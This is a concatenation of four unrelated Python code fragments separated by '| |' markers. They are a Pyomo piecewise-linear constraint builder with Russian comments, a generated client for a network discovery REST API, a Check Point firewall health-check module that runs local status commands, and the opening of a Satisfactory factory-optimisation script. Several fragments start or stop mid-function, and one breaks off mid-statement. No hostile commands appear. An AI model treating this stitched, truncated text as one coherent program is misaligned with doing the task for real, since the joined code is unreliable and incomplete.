b.dimensions = RangeSet(0, ndim-1)
# Списое полигонов
b.simplices = RangeSet(0, nsimplices-1)
# Точки
b.vertices = RangeSet(0, npoints-1)
#
b.t=RangeSet(0,nt-1)
# create variables
# Лямбда
b.lmda = Var(b.vertices,b.t, within=NonNegativeReals)
# y - Принадлежность полигону
b.y = Var(b.simplices,b.t, within=Binary)
# create constraints
# X=сумма(X[i]*Лямбда[i])
# Y=сумма(Y[i]*Лямбда[i])
# Z=сумма(Z[i]*Лямбда[i])
# Для упрощения конструкции
# d=[X Y Z]
def input_c_rule(b, d,t):
#print(d)
#breakpoint()
pointsTd = pointsT[d]
return vars_[t,namevars[d]] == sum(pointsTd[v]*b.lmda[v,t]
for v in b.vertices)
b.input_c = Constraint(b.dimensions, b.t, rule=input_c_rule)
# F=сумма(F[i]*Лямбда[i])
def z_var_rule(b,t):
return vars_[t,namevars[-1]] == sum(zvals[v]*b.lmda[v,t] for v in b.vertices)
b.output_c=Constraint(b.t, rule=z_var_rule)
#b.output_c = Constraint(expr=\
# zvar == sum(zvals[v]*b.lmda[v] for v in b.vertices))
#сумма(Лямбда[i])==1
def lmbda_summ_rule(b,t):
return sum(b.lmda[v,t] for v in b.vertices) == stage
b.convex_c=Constraint(b.t, rule=lmbda_summ_rule)
#b.convex_c = Constraint(expr=\
# sum(b.lmda[v] for v in b.vertices) == 1)
# generate a map from vertex index to simplex index,
# which avoids an n^2 lookup when generating the
# constraint
# Формируем карту принадлежности полигону:
# Лямбда[i]<=сумм(y(смежные с точкой полигоны))
vertex_to_simplex = [[] for v in b.vertices]
for s, simplex in enumerate(tri.simplices):
for v in simplex:
vertex_to_simplex[v].append(s)
def vertex_regions_rule(b, v,t):
return b.lmda[v,t] <= \
sum(b.y[s,t] for s in vertex_to_simplex[v])
b.vertex_regions_c = \
Constraint(b.vertices,b.t, rule=vertex_regions_rule)
# Всегда выбираем один из полигонов:
# Сумм(полигон[i])==1
def single_region_rule(b,t):
return sum(b.y[s,t] for s in b.simplices) == stage
b.single_region_c = Constraint(b.t,rule=single_region_rule)
#b.single_region_c = Constraint(expr=\
# sum(b.y[s] for s in b.simplices) == 1)
return b
def PWL_Block(t,df):
Values = df.values
VarNames = df.columns
ValsF = Values[:,-1].reshape(-1,)
ValsX = Values[:,:-1]
# 1. Формируется список переменных
# Объявляются переменные
b = Block(concrete=True)
b.t = t
b.Vars = Var(b.t,VarNames)
b.Stage = Var(within=Binary)
b.VarNames = VarNames
# 2. Задаётся характеристка поаерхности
if len(VarNames)>2:
# Для функции от 2-х и более переменных
tri = Delaunay(ValsX)
b.PW = BuildPiecewiseND_1S(b.Vars, VarNames, tri, ValsF, b.t, b.Stage)
else:
# Для функции от 1-ой переменной
b.PW = BuildPiecewise1D_1S(b.Vars, VarNames, ValsX.reshape(-1,), ValsF, b.t, b.Stage)
return b
def BlockStages_N(t,*Blocks):
# Формируем ограничения по группе турбин
b = Block(concrete=True)
b.t = t
# Определяем список имён переменных
BlockVarNames=[]
for Bl in Blocks:
for vn in Bl.VarNames:
if vn not in BlockVarNames:
BlockVarNames.append(vn)
# Создаём переменные
b.Vars = Var(b.t, BlockVarNames)
# Переменная состояния
b.Stage = Var(within=Binary)
| |
#!/usr/bin/env python
#pylint: skip-file
# This source code is licensed under the Apache license found in the
# LICENSE file in the root directory of this project.
import sys
import os
import urllib.request, urllib.parse, urllib.error
from .models import *
class DiscoveryApi(object):
def __init__(self, apiClient):
self.apiClient = apiClient
def updateDiscovery(self, **kwargs):
"""Updates an existing discovery specified by id - only for starting/stopping the discovery
Args:
discovery, DiscoveryNIO: Discovery request that holds the status of discovery as active / inactive (required)
Returns: TaskIdResult
"""
allParams = ['discovery']
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method updateDiscovery" % key)
params[key] = val
del params['kwargs']
resourcePath = '/discovery'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'PUT'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
if ('discovery' in params):
bodyParam = params['discovery']
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'TaskIdResult')
return responseObject
def insertDiscovery(self, **kwargs):
"""Starts a new discovery process and returns a task-id
Args:
request, InventoryRequest: Discovery request that holds the parameters required for discovery (required)
Returns: TaskIdResult
"""
allParams = ['request']
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method insertDiscovery" % key)
params[key] = val
del params['kwargs']
resourcePath = '/discovery'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'POST'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
if ('request' in params):
bodyParam = params['request']
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'TaskIdResult')
return responseObject
def deleteAllDiscovery(self, **kwargs):
"""Deletes all discovery
Args:
Returns: TaskIdResult
"""
allParams = []
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method deleteAllDiscovery" % key)
params[key] = val
del params['kwargs']
resourcePath = '/discovery'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'DELETE'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'TaskIdResult')
return responseObject
def getDiscoveryCount(self, **kwargs):
"""Retrieves the number of discoveries
Args:
Returns: CountResult
"""
allParams = []
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method getDiscoveryCount" % key)
params[key] = val
del params['kwargs']
resourcePath = '/discovery/count'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'GET'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'CountResult')
return responseObject
def getDiscoveryJobsByIp(self, **kwargs):
"""Retrieves the list of discovery jobs for the given IP
Args:
offset, int: offset (required)
limit, int: limit (required)
ipAddress, str: ipAddress (required)
Returns: DiscoveryJobNIOListResult
"""
allParams = ['offset', 'limit', 'ipAddress']
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method getDiscoveryJobsByIp" % key)
params[key] = val
del params['kwargs']
resourcePath = '/discovery/job'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'GET'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
if ('offset' in params):
queryParams['offset'] = self.apiClient.toPathValue(params['offset'])
if ('limit' in params):
queryParams['limit'] = self.apiClient.toPathValue(params['limit'])
if ('ipAddress' in params):
queryParams['ipAddress'] = self.apiClient.toPathValue(params['ipAddress'])
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'DiscoveryJobNIOListResult')
return responseObject
def getDiscoveryById(self, **kwargs):
"""Retrieves the discovery specified by id
Args:
id, str: Discovery ID (required)
Returns: DiscoveryNIOResult
"""
allParams = ['id']
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method getDiscoveryById" % key)
params[key] = val
del params['kwargs']
resourcePath = '/discovery/{id}'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'GET'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
if ('id' in params):
replacement = str(self.apiClient.toPathValue(params['id']))
replacement = urllib.parse.quote(replacement)
resourcePath = resourcePath.replace('{' + 'id' + '}',
replacement)
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'DiscoveryNIOResult')
return responseObject
def deleteDiscoveryById(self, **kwargs):
"""Deletes the discovery specified by id
Args:
id, str: Discovery ID (required)
Returns: TaskIdResult
"""
allParams = ['id']
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method deleteDiscoveryById" % key)
params[key] = val
del params['kwargs']
resourcePath = '/discovery/{id}'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'DELETE'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
if ('id' in params):
replacement = str(self.apiClient.toPathValue(params['id']))
replacement = urllib.parse.quote(replacement)
resourcePath = resourcePath.replace('{' + 'id' + '}',
replacement)
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'TaskIdResult')
return responseObject
def getDiscoveryJobsById(self, **kwargs):
"""Retrieves list of discovery jobs for the specified discovery id
Args:
id, str: Discovery ID (required)
offset, int: offset (required)
limit, int: limit (required)
ipAddress, str: ipAddress (required)
Returns: DiscoveryJobNIOListResult
"""
allParams = ['id', 'offset', 'limit', 'ipAddress']
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method getDiscoveryJobsById" % key)
params[key] = val
del params['kwargs']
resourcePath = '/discovery/{id}/job'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'GET'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
if ('offset' in params):
queryParams['offset'] = self.apiClient.toPathValue(params['offset'])
if ('limit' in params):
queryParams['limit'] = self.apiClient.toPathValue(params['limit'])
if ('ipAddress' in params):
queryParams['ipAddress'] = self.apiClient.toPathValue(params['ipAddress'])
if ('id' in params):
replacement = str(self.apiClient.toPathValue(params['id']))
replacement = urllib.parse.quote(replacement)
resourcePath = resourcePath.replace('{' + 'id' + '}',
replacement)
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'DiscoveryJobNIOListResult')
return responseObject
def getNetworkDeviceByDiscoveryId(self, **kwargs):
"""Retrieves the network devices discovered in the discovery specified by id
Args:
taskId, str: taskId (required)
id, str: id (required)
Returns: NetworkDeviceNIOListResult
"""
allParams = ['taskId', 'id']
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method getNetworkDeviceByDiscoveryId" % key)
params[key] = val
del params['kwargs']
resourcePath = '/discovery/{id}/network-device'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'GET'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
| |
<gh_stars>1-10
#
# Copyright 2020 by 0x7c2, <NAME>.
# All rights reserved.
# This file is part of the Report/Analytic Tool - CPme,
# and is released under the "Apache License 2.0". Please see the LICENSE
# file that should have been included as part of this package.
#
from subprocess import Popen, PIPE
import sqlite3
import time
import logme
import files
import func
import kernel
menu_text = "Health Analysis"
menu_item = [ ["Run all checks", "health.check_all(True)"],
["Check memory usage", "health.check_memory(True)"],
["Check disk space", "health.check_diskspace(True)"],
["Check cpu usage", "health.check_cpu(True)"],
["Check system crash", "health.check_crash(True)"],
["Check system logfiles", "health.check_log_system(True)"],
["Check processes", "health.check_process(True)"],
["Check NTP and Time", "health.check_ntp(True)"]]
if func.isFirewall():
menu_item.append(["Check Firewall Fragments", "health.check_fw_fragments(True)"])
menu_item.append(["Check kernel table overflow", "health.check_table_overflow(True)"])
menu_item.append(["Check Aggressive Aging", "health.check_fw_aggressive(True)"])
menu_item.append(["Check memory allocations", "health.check_failedalloc(True)"])
menu_item.append(["Check interface statistics", "health.check_interfaces(True)"])
menu_item.append(["Check licensing", "health.check_licensing(True)"])
menu_item.append(["Check overlapping encdoms", "health.check_overlap_encdom(True)"])
menu_item.append(["Check SIC State", "health.check_sic_state(True)"])
menu_item.append(["Check firewall mode", "health.check_fw_mode(True)"])
menu_item.append(["Check blade update status", "health.check_blade_update(True)"])
menu_item.append(["Check CoreXL dispatcher stats", "health.check_dispatcher(True)"])
menu_item.append(["Check CoreXL connections", "health.check_multik_stat(True)"])
menu_item.append(["Check active Blades", "health.check_blades(True)"])
menu_item.append(["Check protection parsers", "health.check_parsers(True)"])
if func.isFirewall() and func.isCluster():
menu_item.append(["Check ClusterXL state", "health.check_clusterxl_state(True)"])
menu_item.append(["Check ClusterXL sync stat", "health.check_clusterxl_sync(True)"])
menu_item.append(["Check ClusterXL PNotes", "health.check_clusterxl_pnote(True)"])
menu_item.append(["Check fwha_version", "health.check_fwha_version(True)"])
if func.fwVersion() == "R80.30" or func.fwVersion() == "R80.40":
menu_item.append(["Check ClusterXL CCP", "health.check_clusterxl_ccp(True)"])
if func.fwVersion() == "R80.40":
menu_item.append(["Check ClusterXL Multiversion", "health.check_clusterxl_release(True)"])
if func.isManagement():
menu_item.append(["Check Management Status", "health.check_mgmt_status(True)"])
menu_item.append(["Check Management API", "health.check_mgmt_api(True)"])
menu_item.append(["Check GUI Clients", "health.check_mgmt_gui(True)"])
menu_item.append(["Check Database Locks", "health.check_mgmt_dblock(True)"])
menu_item.append(["Check Database Verifications","health.check_mgmt_validations(True)"])
menu_item.append(["Check IPS Update Status", "health.check_mgmt_updateips(True)"])
if len(func.ipmiInfo())>0:
menu_item.append(["Check IPMI Sensor Database", "health.check_ipmi_sensor(True)"])
menu_item.append(["Back to Main Menu", "menu_set('main')"])
def add_text():
return menu_text
def add_item():
return menu_item
results = []
def get_results(clear = False):
global results
res = results
if clear:
results = []
return res
def check_ipmi_sensor(printRes = False):
global results
title = "IPMI Sensor"
for e in func.ipmiInfo():
sensor = e[0].strip(' ')
value = e[1].strip(' ')
vtype = e[2].strip(' ')
sstate = e[3].strip(' ')
if value != "na" and value != "0x0" and value != "0.000":
state = "WARN"
if sstate == "ok":
state = "PASS"
if sstate == "na":
state = "INFO"
detail = value + " " + vtype
results.append([title + " [" + sensor + "]", detail, state, "IPMI Sensor"])
if printRes:
print_results()
def check_blade_update(printRes = False):
global results
title = "Check blade update status"
stat = [ ["URL Filtering", "urlf", 0],
["AntiBot", "antimalware", 0],
["AntiVirus", "antimalware", 1],
["Application Control", "appi", 0]]
i = 0
oldcmd = ""
while i < len(stat):
logme.loader()
newcmd = "cpstat -f update_status " + stat[i][1] + " | grep 'Update status'"
if oldcmd != newcmd:
out, err = func.execute_command(newcmd)
oldcmd = newcmd
data = out.read().split('\n')
val = stat[i][2]
line = data[val].split(':')[1].strip(' ').strip('\n')
state = "FAIL"
detail = ""
if line == "-" or line == "":
state = "INFO"
detail = "not active"
if line == "up-to-date":
state = "PASS"
detail = "up-to-date"
results.append([title + " (" + stat[i][0] + ")", detail, state, "Updates"])
i = i + 1
if printRes:
print_results()
def check_fw_mode(printRes = False):
global results
title = "Check firewall mode"
logme.loader()
out, err = func.execute_command("lsmod")
data = out.read()
state = "FAIL"
detail = "Could not determine"
if "fwmod" in data:
detail = "User Mode"
state = "WARN"
if "fw_0" in data:
detail = "Kernel Mode"
state = "INFO"
results.append([title, detail, state, "Firewall"])
if printRes:
print_results()
def check_mgmt_gui(printRes = False):
global results
title = "Checking GUI Clients"
logme.loader()
out, err = func.execute_command("cp_conf client get")
data = out.read().replace('\n','').strip(' ')
state = "PASS"
detail = ""
if data == "Any":
state = "WARN"
detail = "Any"
results.append([title, detail, state, "Management"])
if printRes:
print_results()
def check_parsers(printRes = False):
global results
title = "Checking protection parsers"
logme.loader()
state = "INFO"
out, err = func.execute_command('cat $FWDIR/state/local/FW1/local.set | grep -A4 parser_settings_profile | grep ":val" | uniq | awk "{print $2}" | tr -d "()"')
for line in out:
logme.loader()
results.append([title, line.strip('\n').replace(':val ','').replace('"',''), state, "Firewall"])
if printRes:
print_results()
def check_blades(printRes = False):
global results
title = "Checking active Blades"
logme.loader()
out, err = func.execute_command("fw stat -b AMW")
for line in out:
logme.loader()
if ":" in line:
tmp = line.strip('\n').split(":")
blade = tmp[0].strip(' ')
status = tmp[1].strip(' ')
else:
blade = ""
status = ""
if ("enable" in status.lower() or "disable" in status.lower()) and "fileapp_ctx_enabled" not in status.lower():
results.append([title + " (" + blade + ")", status, "INFO", "Blades"])
if blade == "IPS" and "enable" in status.lower():
out, err = func.execute_command('cat $FWDIR/state/local/AMW/local.set | grep -A15 malware_profiles | grep ":name" | awk "{print $2}" | tr -d "()"')
for l in out:
results.append(["Thread Prevention Policy", l.strip('\n').replace(':name ', ''), "INFO", "Blades"])
if printRes:
print_results()
def check_dispatcher(printRes = False):
global results
title = "Checking Dispatcher statistics"
logme.loader()
out, err = func.execute_command("fw ctl pstat -m | grep -i 'fwmultik enqueue fail stats' -A 22 | grep -v 'fail stats:'")
data = out.read().split('\n')
error = False
for d in data:
tmp = d.split(":")
if len(tmp) < 2:
continue
field = tmp[0].replace('\t','').strip(' ')
val = tmp[1].strip(' ')
if val != '0':
error = True
results.append([title + " [" + field + "]", val, "WARN", "CoreXL"])
if not error:
results.append([title, "", "PASS", "CoreXL"])
if printRes:
print_results()
def check_mgmt_dblock(printRes = False):
global results
title = "Checking Database Locks"
logme.loader()
out, err = func.execute_command("psql_client cpm postgres -c \"select applicationname,objid,creator,state,numberoflocks,numberofoperations,creationtime,lastmodifytime from worksession where state = 'OPEN' and (numberoflocks != '0' or numberofoperations != '0');\" | tail -n2 | head -n1")
data = out.read().replace('\n','')
state = "WARN"
detail = data
if data == "(0 rows)":
state = "PASS"
detail = ""
results.append([title, detail, state, "Management"])
if printRes:
print_results()
def check_mgmt_validations(printRes = False):
global results
title = "Checking validations"
logme.loader()
out, err = func.execute_command("mgmt_cli -r true --unsafe true show validations")
data = out.read().split('\n')
for d in data:
if "-total" in d:
tmp = d.split(":")
typ = tmp[0]
val = tmp[1].strip(' ')
state = "WARN"
detail = val
if val == "0":
state = "PASS"
detail = ""
results.append([title + " [" + typ + "]", detail, state, "Management"])
if printRes:
print_results()
def check_clusterxl_sync(printRes = False):
global results
title = "Checking ClusterXL Sync"
logme.loader()
fields = ["Lost updates", "Lost bulk update events", "Oversized updates not sent", "Sent reject notifications", "Received reject notifications"]
out, err = func.execute_command("cphaprob syncstat")
data = out.read().split('\n')
error = False
for d in data:
# check sync status
if "Sync status" in d:
tmp = d.split(":")
field = tmp[0].strip(' ')
val = tmp[1].strip(' ')
if val == "OK":
state = "PASS"
detail = ""
else:
state = "FAIL"
detail = val
results.append([title + " [" + field + "]", detail, state, "ClusterXL"])
# check statistics
for f in fields:
if f in d:
val = d.replace(f, '').replace('.','').strip()
if val != "0":
state = "WARN"
detail = val
error = True
results.append([title + " [" + f + "]", detail, state, "ClusterXL"])
if not error:
results.append([title + " [Statistics]", "", "PASS", "ClusterXL"])
if printRes:
print_results()
def check_mgmt_updateips(printRes = False):
global results
title = "Checking IPS Update Status"
logme.loader()
out, err = func.execute_command("mgmt_cli -r true --unsafe true show-ips-status | grep update-available")
data = out.read().replace('\n','')
state = "WARN"
detail = data
if data == "update-available: false":
state = "PASS"
detail = ""
results.append([title, detail, state, "Management"])
if printRes:
print_results()
def check_mgmt_api(printRes = False):
global results
title = "Checking Management API Status"
logme.loader()
out, err = func.execute_command("echo y | api status | grep Overall | awk '{ print $4 }'")
data = out.read().strip('\n').strip(' ')
state = "FAIL"
if data == "Started":
state = "PASS"
results.append([title, data, state, "Management"])
if printRes:
print_results()
def check_mgmt_status(printRes = False):
global results
title = "Checking Management Status"
logme.loader()
out, err = func.execute_command("cpstat mg | grep Status | awk '{print $2}'")
data = out.read().strip('\n').strip(' ')
state = "FAIL"
if data == "OK":
state = "PASS"
results.append([title, data, state, "Management"])
if printRes:
print_results()
def check_overlap_encdom(printRes = False):
global results
title = "Checking overlapping encryption domain"
logme.loader()
out, err = func.execute_command("vpn overlap_encdom | grep -c 'No overlapping encryption domain.'")
data = out.read().strip('\n')
state = "FAIL"
if data == "1":
state = "PASS"
results.append([title, "", state, "VPN"])
if printRes:
print_results()
def check_ntp(printRes = False):
global results
title = "Checking NTP and Time"
logme.loader()
out, err = func.execute_command("ntpstat | grep -ic 'synchronised to'")
data = int(out.read().strip('\n'))
state = "FAIL"
if data > 0:
state = "PASS"
results.append([title, "", state, "GAiA"])
if printRes:
print_results()
def check_licensing(printRes = False):
global results
title = "Checking licensing"
logme.loader()
out, err = func.execute_command("cpstat os -f licensing | grep '|' | awk 'NR>1 {print $0}'")
for line in out:
logme.loader()
state = "FAIL"
data = line.strip('\n').split('|')
blade = data[2].strip(" ")
status = data[3].strip(" ")
expiration = data[4].strip(" ")
active = data[6].strip(" ")
quota = data[7].strip(" ")
used = data[8].strip(" ")
if status == "Not Entitled":
state = "INFO"
if status == "Expired" and active == "0":
state = "WARN"
if status == "Entitled":
state = "PASS"
results.append([title + " (Blade: "+blade+")", status, state, "Licensing"])
if printRes:
print_results()
def check_sic_state(printRes = False):
global results
title = "Checking SIC State"
logme.loader()
out, err = func.execute_command("cp_conf sic state")
state = "FAIL"
for line in out:
logme.loader()
data = line.strip('\n')
if data != "":
detail = data
if "Trust established" in data:
state = "PASS"
results.append([title, detail, state, "Management"])
if printRes:
print_results()
def check_fw_fragments(printRes = False):
global results
title = "Checking Firewall Fragments"
logme.loader()
out, err = func.execute_command("cpstat -f fragments fw | awk 'NR>2 {print $0}'")
for line in out:
logme.loader()
data = line.strip('\n')
if data != "":
state = "FAIL"
d = data.split(":")
field = d[0].strip(' ')
value = d[1].strip(' ')
if int(value) < 100:
state = "WARN"
if value == "0":
state = "PASS"
results.append([title + " (" + field + ")", value, state, "Firewall"])
if printRes:
print_results()
def check_table_overflow(printRes = False):
global results
title = "Check kernel table overflow"
logme.loader()
tables = ['connections', 'fwx_cache']
for t in tables:
logme.loader()
out, err = func.execute_command("fw tab -t " + t + " | grep limit")
out = out.read().strip('\n').split(',')
if out[len(out)-1].strip(' ') == "unlimited":
results.append([title + " [" + t + "]", "unlimited", "PASS", "Firewall"])
else:
logme.loader()
t_limit = int(out[len(out)-1].replace('limit ','').strip(' '))
out, err = func.execute_command("fw tab -t " + t + " -s | grep " + t)
out = out.read().strip('\n').split()
t_peak = int(out[4])
t_val = int(out[3])
m = False
if t_peak > (t_limit * 0.9):
results.append([title + " [" + t + "]", "peak: " + str(t_peak) + "/" + str(t_limit), "WARN", "Firewall"])
m = True
if t_val > (t_limit * 0.9):
results.append([title + " [" + t + "]", "current: " + str(t_val) + "/" + str(t_limit), "FAIL", "Firewall"])
m = True
if not m:
results.append([title + " | |
#!/usr/bin/env python
# coding: utf-8
import scipy.optimize
import json
import numpy as np
import re
import sys
import math
import argparse
from collections import defaultdict
from pprint import pprint
def float_list(s):
return [float(x) for x in s.split(",")] if s else []
parser = argparse.ArgumentParser()
parser.add_argument("--transport-power-cost", type=float, default=50.0,
help="added power cost for transport per conveyor/pipeline of mined resource")
parser.add_argument("--drone-battery-cost", type=float, default=0.5,
help="added battery cost for drone transport per conveyor/pipeline of mined resource")
parser.add_argument("--machine-penalty", type=float, default=2000.0,
help="objective penalty per machine built")
parser.add_argument("--conveyor-penalty", type=float, default=0.0,
help="objective penalty per conveyor belt needed")
parser.add_argument("--pipeline-penalty", type=float, default=0.0,
help="objective penalty per pipeline needed")
parser.add_argument("--power-shard-penalty-ratio", type=float, default=0.6,
help="objective penalty per power shard used, specified as ratio of machine penalty")
parser.add_argument("--extra-miner-clocks", type=float_list, default=[],
help="extra clock choices for miners, specified as decimals")
parser.add_argument("--extra-manufacturer-clocks", type=float_list, default=[0.25, 0.5, 0.75],
help="extra clock choices for manufacturers, specified as decimals")
parser.add_argument("--allow-waste", action="store_true",
help="allow accumulation of nuclear waste and other unsinkable items")
parser.add_argument("--show-unused", action="store_true",
help="show unused LP columns (coeff 0) in the optimization result")
parser.add_argument("--xlsx-report", type=str, default="Report.xlsx",
help="path to xlsx report output")
parser.add_argument("--xlsx-sheet-suffix", type=str, default="",
help="suffix to add to xlsx sheet names")
args = parser.parse_args()
### Constants ###
# Common
STACK_SIZES = {
"SS_HUGE": 500,
"SS_BIG": 200,
"SS_MEDIUM": 100,
"SS_SMALL": 50,
"SS_ONE": 1,
"SS_FLUID": 50000,
}
MACHINE_POWER_SHARD_LIMIT = 3
EPSILON = 1e-9
# Logistics
CONVEYOR_BELT_CLASS = "Build_ConveyorBeltMk5_C"
PIPELINE_CLASS = "Build_PipelineMK2_C"
# Resource extraction
MINER_CLASS = "Build_MinerMk3_C"
OIL_EXTRACTOR_CLASS = "Build_OilPump_C"
WATER_EXTRACTOR_CLASS = "Build_WaterPump_C"
RESOURCE_WELL_EXTRACTOR_CLASS = "Build_FrackingExtractor_C"
RESOURCE_WELL_PRESSURIZER_CLASS = "Build_FrackingSmasher_C"
# Sink
SINK_CLASS = "Build_ResourceSink_C"
# Water
WATER_CLASS = "Desc_Water_C"
# Nuclear power
NUCLEAR_WASTE_MAPPINGS = {
"Desc_NuclearFuelRod_C": "Desc_NuclearWaste_C",
"Desc_PlutoniumFuelRod_C": "Desc_PlutoniumWaste_C",
}
# Geothermal power
GEOTHERMAL_GENERATOR_CLASS = "Build_GeneratorGeoThermal_C"
GEYSER_CLASS = "Desc_Geyser_C"
# Resource map
PURITY_MULTIPLIERS = {
"impure": 0.5,
"normal": 1.0,
"pure": 2.0,
}
POWER_SLUG_SHARDS = {
"greenSlugs": 1,
"yellowSlugs": 2,
"purpleSlugs": 5,
}
RESOURCE_MAPPINGS = {
"Desc_LiquidOilWell_C": "Desc_LiquidOil_C",
"Desc_SAM_C": None, # exclude
}
# Miscellaneous
BIOMASS_GENERATOR_CLASS = "Build_GeneratorBiomass_C"
BATTERY_CLASS = "Desc_Battery_C"
ADDITIONAL_ITEMS = {
"Desc_PlutoniumWaste_C": {
"class": "Desc_PlutoniumWaste_C",
"display_name": "Plutonium Waste",
"form": "RF_SOLID",
"points": 0,
"stack_size": STACK_SIZES["SS_HUGE"],
"energy": 0.0,
},
}
ADDITIONAL_DISPLAY_NAMES = {
GEYSER_CLASS: "Geyser",
}
docs_path = r"Docs.json"
map_info_path = r"MapInfo.json"
with open(docs_path, "r", encoding="utf-16") as f:
docs_raw = json.load(f)
class_entries = {}
class_types = {}
for fg_entry in docs_raw:
class_type = re.sub(r"Class'/Script/FactoryGame.(\w+)'", r"\1", fg_entry["NativeClass"])
class_type_list = []
for class_entry in fg_entry["Classes"]:
class_name = class_entry["ClassName"]
if class_name in class_entries:
print(f"WARNING: ignoring duplicate class {class_name}")
else:
class_entries[class_name] = class_entry
class_type_list.append(class_entry)
class_types[class_type] = class_type_list
### Parsing helpers ###
def parse_paren_list(s):
if not s:
return None
assert(s.startswith("(") and s.endswith(")"))
s = s[1:-1]
if not s:
return []
else:
return s.split(",")
def find_class_name(s):
m = re.search(r"\.\w+", s)
if m is None:
raise ValueError(f"could not find class name in: {s}")
return m[0][1:]
def parse_class_list(s):
l = parse_paren_list(s)
if l is None:
return l
return [find_class_name(x) for x in l]
def find_item_amounts(s):
for m in re.finditer(r"\(ItemClass=([^,]+),Amount=(\d+)\)", s):
yield (find_class_name(m[1]), int(m[2]))
### Misc constants ###
CONVEYOR_BELT_LIMIT = 0.5 * float(class_entries[CONVEYOR_BELT_CLASS]["mSpeed"])
PIPELINE_LIMIT = 60000.0 * float(class_entries[PIPELINE_CLASS]["mFlowLimit"])
SINK_POWER_CONSUMPTION = float(class_entries[SINK_CLASS]["mPowerConsumption"])
print(f"CONVEYOR_BELT_LIMIT: {CONVEYOR_BELT_LIMIT}")
print(f"PIPELINE_LIMIT: {PIPELINE_LIMIT}")
print(f"SINK_POWER_CONSUMPTION: {SINK_POWER_CONSUMPTION}")
### Miners ###
def parse_miner(entry):
if entry["ClassName"] == RESOURCE_WELL_PRESSURIZER_CLASS:
extractor = class_entries[RESOURCE_WELL_EXTRACTOR_CLASS]
else:
extractor = entry
return {
"class": entry["ClassName"],
"display_name": entry["mDisplayName"],
"power_consumption": float(entry["mPowerConsumption"]),
"power_consumption_exponent": float(entry["mPowerConsumptionExponent"]),
"min_clock": float(entry["mMinPotential"]),
"max_clock_base": float(entry["mMaxPotential"]),
"max_clock_per_power_shard": float(entry["mMaxPotentialIncreasePerCrystal"]),
"rate": 60.0 / float(extractor["mExtractCycleTime"]) * float(extractor["mItemsPerCycle"]),
"only_allow_certain_resources": (extractor["mOnlyAllowCertainResources"] == "True"),
"allowed_resource_forms": parse_paren_list(extractor["mAllowedResourceForms"]),
"allowed_resources": parse_class_list(extractor["mAllowedResources"]),
}
miners = {}
